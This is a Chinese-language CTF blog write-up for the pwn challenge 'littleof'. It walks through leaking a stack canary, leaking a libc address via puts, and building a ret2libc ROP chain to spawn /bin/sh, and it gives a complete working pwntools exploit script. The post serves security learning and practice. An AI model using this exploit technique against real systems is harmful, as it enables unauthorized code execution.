littleof ——攻防世界

已于 2022-08-30 18:36:33 修改
阅读量1.7k 收藏 2
点赞数
分类专栏: CTF训练 Linux PWN 文章标签: linux PWN 安全
于 2022-08-30 17:44:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126608916
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 14 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

目录

分析

在这里插入图片描述
发现开启了canary,并且栈不可执行,并且是动态编译,进入IDA进行分析

# main函数
__int64 __fastcall main(int a1, char **a2, char **a3){
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  sub_4006E2();
  return 0LL;
}
// sub_4006E2 函数
unsigned __int64 sub_4006E2(){
  char buf[8]; // [rsp+10h] [rbp-50h] BYREF
  FILE *v2; // [rsp+18h] [rbp-48h]
  unsigned __int64 v3; // [rsp+58h] [rbp-8h]
  v3 = __readfsqword(0x28u);
  v2 = stdin;
  puts("Do you know how to do buffer overflow?");
  read(0, buf, 0x100uLL);
  printf("%s. Try harder!", buf);
  read(0, buf, 0x100uLL);
  puts("I hope you win");
  return __readfsqword(0x28u) ^ v3;
}

发现溢出点还是挺多的,但开启了canary,因此本题主要是绕过canary

题解

canary绕过

canary其实就是在ebp之上设置了一块8字节内存,该字节不准改变,每次函数执行都会对canary进行校验,一旦发现被改变就会强行退出,因此普通的溢出失效,如图,一般canary最后两位为0
在这里插入图片描述
解决思路: 若能获取canary的值,溢出时将canary还原即可

# canary绕过
# encoding=utf-8
from pwn import *
context.log_level = True
context(os='linux', arch='amd64')
fpath = '/home/kali/Desktop/pycahrm_project/功防世界/littleof/littleof'
r = process(fpath)
# r = remote("182.116.62.85", 27056)
elf = ELF(fpath)
libc = elf.libc
payload = b'a' * (0x50 - 8) # 0x50-8是正好填充到canary为止
r.sendlineafter("Do you know how to do buffer overflow?", payload)
# 泄露canary
r.recvuntil(payload) # 该程序会将输入的字符串打印出来,因此先接受一下
canary = u64(r.recv(8)) - 0x0a  # 0x0a为换行符
# 这里减去0x0a[换行] 是因为canary最后两位为0,有时候常用canary = u64(io.recv(7).rjust(8, '\x00'))
log.debug("Canary: " + hex(canary))
# 泄露ebp地址
init_addr = u64(r.recv(8).ljust(8, b'\0'))
log.debug("init_addr:" + hex(init_addr))

泄露libc地址

因为最后想用system(“/bin/sh”),而程序没有system和/bin/sh,因此要用libc里的数据

poprdi_addr = 0x400863
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x400600
payload = b'a' * (0x50 - 8) + p64(canary) + p64(0) + p64(poprdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendlineafter("Try harder!", payload)
r.recvuntil("I hope you win\n")
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) # 直到7f出现的位置作为终点,开始往前读6个字节数据,然后再8字节对齐,不足8位补\x00。
# u64是用来解包的,将整形转为字符型,也就是说里面接收的应该是字节流
# l.just(8,'\x00')指取8个字节,不够的用\x00,即0来填充
# p.recvuntil('\x7f')[-6:] \x7f是64位程序函数地址的默认开头,-6就是从倒数第6个字节开始取,在内存中是倒着放的
print("puts_addr:" + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print("libc_base:" + hex(libc_base))

找到system函数和/bin/sh

sysoffset = libc.symbols['system']
sys_addr = sysoffset + libc_base
print("sys_addr:" + hex(sys_addr))
sh_offset = next(libc.search(b"/bin/sh\0"))
sh_addr = sh_offset + libc_base
print("sh_addr:" + hex(sh_addr))

构造提权攻击payload

ret_addr = poprdi_addr + 1
payload = b'a' * (0x50 - 8) + p64(canary) + p64(0) + p64(poprdi_addr) + p64(sh_addr) + p64(ret_addr) + p64(sys_addr)
r.sendline(payload)
r.interactive()

完整代码

# encoding=utf-8
from pwn import *
context.log_level = True
context(os='linux', arch='amd64')
fpath = '/home/kali/Desktop/pycahrm_project/功防世界/littleof/littleof'
r = process(fpath)
# r = remote("182.116.62.85", 27056)
elf = ELF(fpath)
libc = elf.libc
payload = b'a' * (0x50 - 8)
r.sendlineafter("Do you know how to do buffer overflow?", payload)
# 泄露canary
r.recvuntil(payload)
canary = u64(r.recv(8)) - 0x0a # 这里减去0x0a[换行] 是因为canary最后两位为0,有时候常用canary = u64(io.recv(7).rjust(8, '\x00'))
log.debug("Canary: " + hex(canary))

init_addr = u64(r.recv(8).ljust(8, b'\0'))
log.debug("init_addr:" + hex(init_addr))

poprdi_addr = 0x400863
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x400600
payload = b'a' * (0x50 - 8) + p64(canary) + p64(0) + p64(poprdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendlineafter("Try harder!", payload)
r.recvuntil("I hope you win\n")
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) # 直到7f出现的位置作为终点,开始往前读6个字节数据,然后再8字节对齐,不足8位补\x00。
# u64是用来解包的,将整形转为字符型,也就是说里面接收的应该是字节流
# l.just(8,'\x00')指取8个字节,不够的用\x00,即0来填充
# p.recvuntil('\x7f')[-6:] \x7f是64位程序函数地址的默认开头,-6就是从倒数第6个字节开始取,在内存中是倒着放的
print("puts_addr:" + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print("libc_base:" + hex(libc_base))

sysoffset = libc.symbols['system']
sys_addr = sysoffset + libc_base
print("sys_addr:" + hex(sys_addr))
sh_offset = next(libc.search(b"/bin/sh\0"))
sh_addr = sh_offset + libc_base
print("sh_addr:" + hex(sh_addr))

r.sendlineafter("Do you know how to do buffer overflow?", "aa")
ret_addr = poprdi_addr + 1
payload = b'a' * (0x50 - 8) + p64(canary) + p64(0) + p64(poprdi_addr) + p64(sh_addr) + p64(ret_addr) + p64(sys_addr)
r.sendline(payload)
r.interactive()
Mokapeng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
缓冲区溢出漏洞_缓冲区溢出漏洞简介
weixin_26747751的博客
09-14 2048
缓冲区溢出漏洞 重点 (Top highlight) 缓冲 (Buffer) A buffer is a temporary storage, usually present in the physical memory used to hold data. 缓冲区是一种临时存储,通常存在于用于保存数据的物理内存中。 Consider the program shown in the left ...
攻防世界--- PWN学习笔记
m0_62879498的博客
12-03 413
PWN学习笔记 一,栈介绍 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时候从栈顶开始弹出数据(最后一个数据被第一个读出来),是一种特殊的线性表。栈的操作常用的有进栈(PUSH),出栈(POP),还有常用的标识栈顶和栈底。 进栈(PUSH):将一个数据放入栈里叫进栈(PUSH) 出栈(POP):将一个数据从栈里取出叫出栈(POP) 栈顶:常用寄存器ESP,ESP是栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面
PWN · ret2libc | Canary】[2021 鹤城杯]littleof
Mr_Fmnwon的博客
06-08 851
Canary作为经典且基本的栈保护措施,在后期的题目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。不断总结,不断求学。
NSSCTF [2021 鹤城杯]littleof
红叶的博客
03-02 654
很显然栈溢出漏洞位于read函数中,buf大小为0x50,而read函数的第三参数,也就是输出/写入/输出的最大的字节长度为0x100,就是2个buf大小的数据。开启 Canary : RBP 位于 0x50 + 0x08,Canary位于0x50 - 0x08,Return Address位于0x50 + 0x16。因为Canary是栈中的一个随机值,我们通过printf泄露Canary,然后将其填充至它本来应该在的位置,就能通过检查。
鹤城杯PWN几道题的writeup
10-09 564
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
CTF——攻防世界第一篇
01-08
昨天下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的中文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
信息安全实验一:buffer-overflow
weixin_33714884的博客
03-07 599
title: buffer-overflow date: 2016-01-10 14:17:17 categories: information-security tags: buffer-overflow --- Excrcise1 Now, you can write some code. Your job is to print the address of the variable bu...
首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛部分WP
七堇年的博客
12-24 2541
首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP
知乎小白关于ctf竞赛训练 积累的资料
热门推荐
syh_486_007的专栏
09-04 3万+
一个巧合的机会,成为了CTF夺旗爱好者,一个ctf小白。从12年开始国内大大小小的CTF比赛我都看过,那会还没有统一叫CTF,都是叫 网络攻防赛、信息安全赛之类的,目的就是为了通过技术手段找到最终的key(现在的CTF中叫做flag)。只是到了后来慢慢的可能受到DEFCON CTF的影响国内所有的安全竞赛也统一叫做CTF竞赛了。 国内外比较知名的比赛:XCTF联赛、DEFCON CTF、首都网络
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2070
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
攻防世界-PWN-secret_holder-Unlink
aptx4869_li的博客
04-06 424
解题思路 保护机制 题目文件见文末连接,攻防世界平台上下载下来的不知道是啥东西 healer@healer-virtual-machine:~/Desktop/secret_holder$ checksec SecretHolder [*] '/home/healer/Desktop/secret_holder/SecretHolder' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2525
攻防世界的格式化字符串漏洞利用,简单题
BUU pwn 刷题
qq_36495104的博客
05-19 1490
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
攻防世界-PWN-shell
aptx4869_li的博客
05-29 339
攻防世界-PWN-shell 检查保护机制 healer@healer-virtual-machine:~/Desktop/shell$ checksec shell [*] '/home/healer/Desktop/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x4000
CTF笔记:ROP技术
PwnGuo的博客
05-19 669
Security Fest CTF 2016-tvstation 程序执行情况 运行程序发现菜单只有3个选项,但实际在IDA分析可见有选项4. 并且选项4中debug()函数输出system在内存中地址 查看返回值debug_func()函数,明显存在溢出点。 .text节(Section)属于第一个LOAD段(Segment),这个段的文件长度和内存长度是一样的,也就是说所有的代码都是原样映射到内存中,代码之间的相对偏移是不会改变的。由于前面的...
攻防世界 easyphp
最新发布
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值